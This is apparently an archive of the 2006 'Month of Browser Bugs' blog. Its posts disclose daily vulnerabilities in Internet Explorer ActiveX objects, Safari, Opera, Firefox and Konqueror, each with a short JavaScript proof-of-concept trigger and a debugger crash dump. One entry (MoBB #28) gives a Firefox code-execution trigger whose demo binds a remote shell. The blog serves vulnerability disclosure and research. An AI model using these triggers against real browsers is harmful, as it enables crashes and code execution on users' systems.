Putting the fun in browser fun

Matt Miller posted to the Metasploit Blog about a technique that allows arbitrary code execution in Internet Explorer using any fatal unhandled exception. Every Internet Explorer denial of service flaw is exploitable if MS06-051 has not been installed. More information can be found in the Uninformed Journal article.

Orphan Objects bug was silently fixed

MoBB #30 was silently fixed last Tuesday by Microsoft's cumulative security patch for Internet Explorer (MS06-042).

Read more at my blog: "MS06-042: One Silent Fix, One No Fix".

MS06-044 - Internet Explorer 5.x

Microsoft released MS06-044 to address a local zone privilege escalation vulnerability I reported in Internet Explorer 5 on Windows 2000. According to Microsoft, over five million people are still using the Windows Update service with Internet Explorer 5. This vulnerability exploits a XSS flaw in the RT_HTML resource of a DLL included with Windows 2000. The demonstration below will use this XSS flaw to execute calc.exe on vulnerable systems.

Demonstration

AxMan ActiveX Fuzzer

As promised, I have released my ActiveX fuzzing tool, aptly named AxMan. This tool was used to discover and debug almost every single ActiveX flaw published during the Month of Browser Bugs. In addition to the MoBB issues, this tool discovered over 100 unique flaws on a Windows XP SP2 system with common third-party packages installed. I am releasing this tool without my blacklist.js file of discovered vulnerabilities; this should give the vendors some breathing room while they figure out how to address these problems. An online demonstration of AxMan is available, but the interface is not designed to work across a slow network and a locally installed version will run much faster. Enjoy and happy bug hunting!

Concluding the Month of Browser Bugs

The Month of Browser bugs is finished! Jericho was kind enough to write up a review of the MoBB project in the OSVDB Blog. Although the MoBB project is complete, this blog will continue to be used to publish new and interesting browser hacks. Aviv Raff and Pusscat have offered to help out in the coming months by moderating comments and publishing new browser-related security findings. Thanks again to everyone who submitted comments and otherwise participated in the project.

MoBB #31: Safari KHTMLParser::popOneBlock

The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4 (PPC) system. Safari will dereference and call a pointer from the heap if a script element, inside a div element, redefines the document body. Code execution is possible, but more time is required to develop a reliable exploit. This bug was discovered by Jose Avila III and Pusscat. Strangely enough, this bug does not affect KDE's Konqueror (tested 3.5.3).

Please see the demo source code for an example.

Warning: The following link may cause your browser to crash.
Demonstration

Program received signal EXC_BAD_INSTRUCTION, Illegal instruction/operand.
(gdb) x/i $pc
0x4aeec58: .long 0x690074

#0 0x04aeec58 in ?? ()
#1 0x95c6f884 in KHTMLParser::popOneBlock ()
#2 0x95c43998 in KHTMLParser::freeBlock ()
#3 0x95cdff3c in KHTMLParser::finished ()
#4 0x95cdfe7c in khtml::HTMLTokenizer::end ()
#5 0x95c7ec8c in khtml::HTMLTokenizer::finish ()
#6 0x95d90358 in KHTMLPart::endIfNotLoading ()

0x95c6f8c4 <_ZN11KHTMLParser11popOneBlockEb+132>: lwz r2,0(r3)
0x95c6f8c8 <_ZN11KHTMLParser11popOneBlockEb+136>: lwz r12,268(r2)
0x95c6f8cc <_ZN11KHTMLParser11popOneBlockEb+140>: mtctr r12
0x95c6f8d0 <_ZN11KHTMLParser11popOneBlockEb+144>: bctrl

This bug will be added to the OSVDB:
Apple Safari KHTMLParser::popOneBlock Code Execution

MoBB #30: Orphan Object Properties

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug was discovered by Aviv Raff while working on a new browser fuzzing tool. It is possible to trigger a NULL dereference by accessing the property of an object that is inside a deleted frame.

Please see the demo source code for an example.

Demonstration

eax=00000000 ebx=01ba7180 ecx=00000000
edx=7dc95b90 esi=00000000 edi=00000000
eip=7dc9d8ba esp=0013dc98 ebp=0013dccc
mshtml!CMarkup::EnsureTopElems+0xc:
7dc9d8ba 8b7744 mov esi,dword ptr [edi+44h] ds:0023:00000044=????????

This bug will be added to the OSVDB:
Microsoft IE Orphan Object Property Access NULL Dereference

MoBB #29: ADODB.Recordset NextRecordset

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the NextRecordset method repeatedly with a long string can result in an invalid memory access inside the SysFreeString function. This bug is similar to MoBB #8 and MoBB #21.

var a = new ActiveXObject('ADODB.Recordset');
var b = 'XXXX';
while (b.length <= 1024*512) b+=b;
for (var i = 0; i < 32768; i++) try { a.NextRecordset(b); } catch(e) {}

Demonstration

eax=00181358 ebx=0013b1c4 ecx=00000007
edx=0000400c esi=02d30020 edi=00000008
eip=77124874 esp=0013ae68 ebp=0013ae6c
OLEAUT32!SysFreeString+0x45:
77124874 8b0e mov ecx,[esi] ds:0023:02d30020=???

This bug will be added to the OSVDB:
Microsoft IE ADODB.Recordset SysFreeString Invalid Length

MoBB #28: Mozilla Navigator Object

The following bug (mfsa2006-45) was tested on Firefox 1.5.0.4 running on Windows 2000 SP4, Windows XP SP2, and a recently updated Gentoo Linux system. This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is trivial to turn into a working exploit. The demonstration link below will attempt to launch "calc.exe" on Windows systems, execute "touch /tmp/METASPLOIT" on Linux systems, and bind a command shell to port 4444 for Mac OS X Intel and PowerPC systems (thanks Todd and nemo!).

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

Demonstration

This bug has been added to the OSVDB:
Mozilla Multiple Product Window Navigator Object Arbitrary Code Execution

MoBB #27: NDFXArtEffects RGBExtraColor

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. stack overflow can occur by setting one of the RGBExtraColor, RGBForeColor, and RGBBackColor properties to a long string value. Since the entire string is placed into a stack buffer, you are able to select exactly what instruction to fault on based on the length of the string. Does anyone know of a way to exploit this for something besides a crash?

var b = 'XXXX';
while(b.length <=1024*1024) b+=b;
var a = new ActiveXObject('DXImageTransform.Microsoft.NDFXArtEffects.1');
var i = 1016320;
a.RGBExtraColor = b.substring(0,i);

Demonstration

eax=4db88a05 ebx=000f8201 ecx=7c809f8a
edx=0013b274 esi=02f50024 edi=00000000
eip=4db88a11 esp=00043000 ebp=0013b254
wmm2fxb!DXColorFromBSTR+0xc8:
4db88a11 57 push edi

This bug will be added to the OSVDB:
Microsoft IE NDFXArtEffects Multiple Property Stack Overflow

MoBB #26: Opera CSS Background

The following bug was tested on the latest version of Opera 9 on a fully-patched Windows XP SP2 system. A memory corruption issue can be triggered by setting the background property of any DHTML element to a long HTTPS URL.

var a = document.createElement('a');
var b = 'XXXX';
while (b.length <= 1024*1024) b+=b;
a.style.background = 'url(https://' + b + ')';

Demonstration

eax=0c4f0020 ebx=00000000 ecx=0c4f0020
edx=0a4b0030 esi=00953ff8 edi=00200008
eip=67befb98 esp=0012e38c ebp=0012e404
Opera_679e0000+0x20fb98:
67befb98 668b32 mov si,[edx] ds:0023:0a4b0030=0000

This bug will be added to the OSVDB:
Opera CSS Background Property HTTPS Memory Corruption

MoBB #25: Native Function Iterator

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. A NULL reference can be triggered by using javascript to iterate over a native function.

for (var i in window.alert) { var a = 1; }

Demonstration

eax=00000000 ebx=ffffffff ecx=0013b3f0
edx=0013b3f0 esi=00000000 edi=0013b488
eip=7dceef12 esp=0013b3d0 ebp=0013b3d4
mshtml!CPtrBagVTableAggregate::CIterator::Start+0x1e:
7dceef12 ff36 push dword ptr [esi] ds:0023:00000000=?????

This bug will be added to the OSVDB:
Microsoft IE Native Function Iteration NULL Dereference

MoBB #24: Forms.ListBox.1 ListWidth

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system with the latest version of Office 2003 installed. Setting the ListWidth property of either the Forms.ListBox.1 or Forms.ComboBox.1 objects to 0x7fffffff will result in an integer overflow exception, while setting it to 0x7ffffffe will trigger a NULL dereference.

var a = new ActiveXObject('Forms.ListBox.1');
a.ListWidth = 0x7ffffffe;

Demonstration

eax=00000000 ebx=0013b0d8 ecx=00000001
edx=00000052 esi=0013b084 edi=600b115e
eip=60009115 esp=0013b044 ebp=0013b044
FM20!DllGetClassObject+0x6bd5:
60009115 0fb710 movzx edx,word ptr [eax] ds:0023:00000000=????

This bug will be added to the OSVDB:
Microsoft IE Forms Multiple Object ListWidth Property Integer Overflow

MoBB #23: NMSA.ASFSourceMediaDescription dispValue

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. Setting the dispValue property of this object to a long string triggers a stack overflow (not a buffer overflow).

var a = new ActiveXObject('NMSA.ASFSourceMediaDescription.1');
var b = 'XXXX';
while (b.length <= 1024) b += b;
a.dispValue = b;

Demonstration

eax=027221f8 ebx=00000000 ecx=0019d198
edx=00160dae esi=027221f8 edi=00000000
eip=77a22395 esp=00032f78 ebp=00033180
OLEAUT32!CTypeInfo2::VariantVtOfHtype+0x9:
77a22395 56 push esi

This bug will be added to the OSVDB:
Microsoft IE NMSA.ASFSourceMediaDescription dispValue Stack Overflow

MoBB #22: Internet.HHCtrl Click

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the Click() method on this object, without first initializing the URL, will trigger a NULL dereference. This bug was submitted by Alex F.

var a = new ActiveXObject("Internet.HHCtrl.1");
a.Click();

Demonstration

eax=00000000 ebx=00000000 ecx=00000000
edx=00000000 esi=0237bb68 edi=00000000
eip=7db374c0 esp=0013a3d0 ebp=0013a3f0
hhctrl!CHtmlHelpControl::GetCurrentUrl+0x3c:
7db374c0 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug will be added to the OSVDB:
Microsoft IE HTML Help COM Object Click Method NULL Dereference

MoBB #21: CEnroll stringToBinary

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the stringToBinary() function with a long string for the second parameter can result in an invalid memory access inside the SysAllocStringLen function. This bug is similar to MoBB #8.

var a = new ActiveXObject('CEnroll.CEnroll.2');
var b = 'BOOM';
while (b.length <= 1024*1024) b+=b;
a.stringToBinary(1, b);

Demonstration

eax=03580024 ebx=00300000 ecx=0005fc08
edx=00300000 esi=03571000 edi=03701004
eip=77124ba4 esp=0013b200 ebp=0013b20c
OLEAUT32!SysAllocStringLen+0x4f:
77124ba4 f3a5 rep movsd ds:03571000=???????? es:03701004=00000000

This bug will be added to the OSVDB:
Microsoft IE CEnroll SysAllocStringLen Invalid Length

MoBB #20: OVCtl NewDefaultItem

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Outlook to be installed. Calling the NewDefaultItem() method triggers a NULL dereference. This bug was submitted by Alfredo Melloni.

var a = new ActiveXObject('OVCtl.OVCtl.1');
a.NewDefaultItem();

Demonstration

eax=00000000 ebx=00000800 ecx=0013b234
edx=0013b200 esi=00000000 edi=357a3b58
eip=357b07e3 esp=0013b1c4 ebp=0013b240
OUTLCTL!DllUnregisterServer+0x3678:
357b07e3 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug will be added to the OSVDB:
Microsoft IE OVCtl NewDefaultItem Method NULL Dereference

MoBB #19: DataSourceControl getDataMemberName

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Office 2003 to be installed (older versions of this control have not been tested). Calling the getDataMemberName() method with a negative large integer value results in an integer overflow and a NULL dereference.

var a = new ActiveXObject('OWC11.DataSourceControl.11');
a.getDataMemberName(-0x80000000);

Demonstration

eax=0000001c ebx=025d15a8 ecx=0000001c
edx=387d0e24 esi=0013b234 edi=0013b204
eip=3878cfac esp=0013b1fc ebp=0013b228
OWC11!DllGetClassObject+0x5a3e4:
3878cfac 8b01 mov eax,[ecx] ds:0023:0000001c=????????

This bug will be added to the OSVDB:
Microsoft IE OWC11.DataSourceControl getDataMemberName Method Integer Overflow

MoBB #18: WebViewFolderIcon setSlice

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the setSlice() method with the first argument set to 0x7fffffff triggers an invalid memory copy.

var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
a.setSlice(0x7fffffff, 0, 0x41424344, 0);

Demonstration

eax=00000010 ebx=001e4940 ecx=00000004
edx=7c97c0d8 esi=0013b188 edi=fffffff0
eip=773e0ba3 esp=0013b14c ebp=0013b158
comctl32!DSA_SetItem+0x60:
773e0ba3 f3a5 rep movsd ds:0013b188=41424344 es:fffffff0=????????

This bug will be added to the OSVDB:
Microsoft IE WebViewFolderIcon setSlice Integer Overflow

MoBB #17: Gradient StartColorStr

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the StartColorStr or EndColorStr properties to a large value leads to a stack overflow exception (not a buffer overflow).

var a = new ActiveXObject('DXImageTransform.Microsoft.Gradient.1');
var b = 'XXXX';
while (b.length <= (1024*1024)) b += b;
a.StartColorStr = b;

Demonstration

eax=00007004 ebx=00100001 ecx=0004215c
edx=0013b1ac esi=03b00024 edi=00000000
eip=6be11a16 esp=0013b154 ebp=0013b190
dxtmsft!_chkstk+0x25:
6be11a16 8501 test [ecx],eax ds:0023:0004215c=00000000

This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.Gradient Multiple Property Stack Overflow

MoBB #16: MHTMLFile Location

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the location or URL property triggers a NULL dereference. Thanks to 'sniper' for the submission.

var a = new ActiveXObject('mhtmlfile');
a.location = "http://browserfun.blogspot.com";

Demonstration

eax=00000000 ebx=00000001 ecx=0000ae80
edx=0020540c esi=019c2420 edi=00000000
eip=7dcd113e esp=00139048 ebp=0013b074
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??

This bug will be added to the OSVDB:
Microsoft IE MHTMLFile Multiple Property NULL Dereference

MoBB #15: FolderItem Access

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Accessing the object reference of this control triggers a NULL dereference in the security check :-)

<object id="target" classid="clsid:FEF10FA2-355E-4e06-9381-9B24D7F7CC88">
</object>

var a = document.getElementById('target');
alert(a.object);

Demonstration

eax=0000eb6c ebx=00000000 ecx=00000000
edx=09105b62 esi=0013b1ac edi=03cec120
eip=7cb86ce4 esp=0013aee4 ebp=0013b184
SHELL32!CFolder::_SecurityCheck:
7cb86ce4 83790c00 cmp dword ptr [ecx+0xc],0x0 ds:0023:0000000c=????????

This bug will be added to the OSVDB:
Microsoft IE FolderItem Object NULL Dereference

MoBB #14: Konqueror replaceChild()

The following bug was tested on KDE 3.5.1 on a current Gentoo Linux system. Calling the replaceChild() method on almost any DOM element can result in a NULL dereference.

document.replaceChild(0);

Demonstration

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1231504512 (LWP 11418)]
0xb6552ca0 in DOM::Node::replaceChild () from /usr/kde/3.5/lib/libkhtml.so.4
(gdb) display /i $pc
1: x/i $pc 0xb6552ca0 <_ZN3DOM4Node12replaceChildERKS0_S2_+110>: testb $0x8,0x22(%edx)
(gdb) i r $edx
edx 0x0 0

This bug will be added to the OSVDB:
KDE Konqueror replaceChild() NULL Dereference

MoBB #13: RevealTrans Transition

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the Transition property of this object triggers a NULL dereference.

var a = new ActiveXObject('DXImageTransform.Microsoft.RevealTrans.1');
a.Transition = 1;

Demonstration

eax=00000000 ebx=00000000 ecx=35cde0c4
edx=00174972 esi=02d701d8 edi=00000001
eip=35cde0fe esp=0012b240 ebp=0012b25c
dxtmsft!CDXTRevealTrans::put_Transition+0x3a:
35cde0fe 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.RevealTrans Transition Property NULL Dereference

MoBB #12: TriEditDocument URL

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the URL property of this object triggers a NULL dereference.

var a = new ActiveXObject('TriEditDocument.TriEditDocument');
a.URL = "Boom!";

Demonstration

eax=00000000 ebx=00000001 ecx=000076b6
edx=018f486c esi=018f3c10 edi=00000000
eip=7dcd113e esp=00137034 ebp=00139060
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??

This bug will be added to the OSVDB:
Microsoft IE TriEditDocument URL Property NULL Dereference

MoBB #11: HtmlDlgSafeHelper fonts

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the "fonts" property of this object triggers a NULL dereference.

var a = new ActiveXObject('HtmlDlgSafeHelper.HtmlDlgSafeHelper');
a.fonts = "Goodbye!";

Demonstration

eax=00000000 ebx=76207320 ecx=02941584
edx=762691dc esi=02941534 edi=0013b25c
eip=762163fb esp=0013b1ec ebp=0013b260
mshtmled!CHtmlDlgSafeHelper::get_Fonts+0x66:
762163fb 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE HtmlDlgSafeHelper fonts Property NULL Dereference

MoBB #10: DXTFilter Enabled

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. By setting the 'Enabled' property of this control to a true value, we can trigger a NULL dereference.

var a = new ActiveXObject('Object.Microsoft.DXTFilter');
a.Enabled = 1;

Demonstration

eax=00000000 ebx=6bdd4728 ecx=00001008
edx=001bffff esi=02910488 edi=00000000
eip=6bde8881 esp=0013b250 ebp=0013b258
dxtrans!CDXTFilter::put_Enabled+0x75:
6bde8881 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE Object.Microsoft.DXTFilter Enabled Property NULL Dereference

MoBB #9: DirectAnimation.DAUserData Data

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The "Data" property of the DAUserData object is designed to be accessed only after it has been initialized. We can trigger a NULL dereference by asking for it without calling the Init() method first.

var a = new ActiveXObject('DirectAnimation.DAUserData');
a.Data = 'Hello';

Demonstration

eax=00000000 ebx=5a327320 ecx=00000000
edx=0003b7c8 esi=00000000 edi=0003f1cc
eip=5a3415b6 esp=0013b1a4 ebp=0013b1b4
danim!CRUserDataImpl::GetData+0x5:
5a3415b6 837e0800 cmp dword ptr [esi+0x8],0x0 ds:0023:00000008=????????

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE DirectAnimation.DAUserData Data Property NULL Dereference

MoBB #8: RDS.DataControl URL

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. The RDS.DataControl object copies the URL parameter from javascript using the SysAllocStringLen routine in OLE32.dll. On Windows 2000, this can lead to an invalid length calculation that results in a memory read going beyond the end of the page. It appears that some form of heap corruption may be occurring before the access violation, but without a SEH pointer on the heap, this isn't useful for exploitation. If you can find a way achieve code execution using this bug, please contact me for a prize :-)

var a = new ActiveXObject('RDS.DataControl');
var b = "X";
while (b.length < (1024*256)) a.URL = (b+=b);

Demonstration

eax=001be00c ebx=00005a70 ecx=00000231
edx=00005a70 esi=00191000 edi=001c31b8
eip=779d927a esp=0012b1b4 ebp=7c59c147
OLEAUT32!SysAllocStringLen+0x7a:
779d927a f3a5 rep movsd ds:00191000=???????? es:001c31b8=00580058

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE RDS.DataControl SysAllocStringLen Invalid Length

MoBB #7: Table.Frameset

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug was found by Aviv Raff using the DOM-Hanoi fuzzer script. DOM-Hanoi works by building trees of every combination of elements up to the specifed depth. An alternate PoC could use plain HTML instead of javascript.

var a = document.createElement('table');
var b = document.createElement('frameset');
a.appendChild(b);

Demonstration

eax=00000000 ebx=01884710 ecx=01886c60
edx=00000027 esi=0013aeb0 edi=01884730
eip=7dc995ad esp=0013ae88 ebp=0013ae9c6
mshtml!CTreePos::NextTreePos+0x23:
7dc995ad f60010 test byte ptr [eax],0x10 ds:0023:00000000=??

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE Frameset inside Table NULL Dereference

MoBB #6: StructuredGraphicsControl SourceURL

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULL pointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here) does not result in a crash.

var a = new ActiveXObject('DirectAnimation.StructuredGraphicsControl');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';

Demonstration

eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug will be added to the OSVDB:
Microsoft IE DirectAnimation.StructuredGraphicsControl SourceURL NULL Dereference

MoBB #5: DHTML setAttributeNode()

The following bug was tested on the latest version of Safari ( 2.0.4 / 419.3) on a fully-patched Mac OS X (10.4.7 - Build 8J135) system. This bug was discovered by Dennis Cox using a modified version of the Hamachi test. This bug does not trigger using the Konqueror KHTML/KJS engine included with KDE 3.5.1, even though these products share code.

var a = document.createElement("a");
a.setAttributeNode();

Demonstration

Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x0000000c

Thread 0 Crashed:
0 com.apple.WebCore DOM::NamedAttrMapImpl::setNamedItem()
1 com.apple.WebCore DOM::Element::setAttributeNodeNS()
2 com.apple.WebCore DOM::Element::setAttributeNode()

This bug will be added to the OSVDB:
Apple Safari DHTML setAttributeNode() NULL Dereference

MoBB #4: Mozilla Firefox DesignMode

The following bug was tested on Mozilla Firefox 1.5.0.2 running on Gentoo Linux. This bug was fixed in Firefox 1.5.0.3, after three other people reported this issue to Mozilla. This bug results in a function pointer being called that no longer exists on the heap. Exploiting it is more annoying than difficult, since getting user-provided memory to map over the free'd object pointer is more convoluted than it should be.

document.designMode = "on";
for (i=0; i < 300; i++) {
document.execCommand("InsertHTML", false, "<iframe src='localhost'/>");
}
document.designMode = "off";
window.location.reload(true);

Demonstration

EIP on Gentoo Linux / Firefox 1.5.0.1
0x00737069 in ?? ()

This bug was addressed in MFSA2006-30.
This bug has been added to the OSVDB:
Mozilla Firefox iframe.contentWindow.focus() Overflow

MoBB #3: OutlookExpress.AddressBook

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. It appears to have been resolved (via killbit) in a recent update to Window XP SP2. This bug is one of many that are triggered by loading a non-ActiveX COM object from inside Internet Explorer.

a = new ActiveXControl('OutlookExpress.AddressBook');

Demonstration

eax=00000000 ebx=06622008 ecx=00000002
edx=065814e4 esi=00000000 edi=00000000
eip=0648b2f5 esp=0012a734 ebp=0012a754
msoe!IDwGetOption+0x78:
0648b2f5 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE OutlookExpress.AddressBook COM Object NULL Dereference.

MoBB #2: Internet.HHCtrl Image Property

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug is interesting because a small heap overflow occurs each time this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after 128 or more iterations of the property set.

var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;

for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}

Demonstration

eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE HTML Help COM Object Image Property Heap Overflow.

MoBB #1: ADODB.Recordset Filter Property

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.

a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }

Demonstration

eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE ADODB.Recordset COM Object Filter Property NULL Dereference.

Welcome to the Browser Fun Blog!

This blog will serve as a dumping ground for browser-based security research and vulnerability disclosure. To kick off this blog, we are announcing the Month of Browser Bugs (MoBB), where we will publish a new browser hack, every day, for the entire month of July. The hacks we publish are carefully chosen to demonstrate a concept without disclosing a direct path to remote code execution. Enjoy!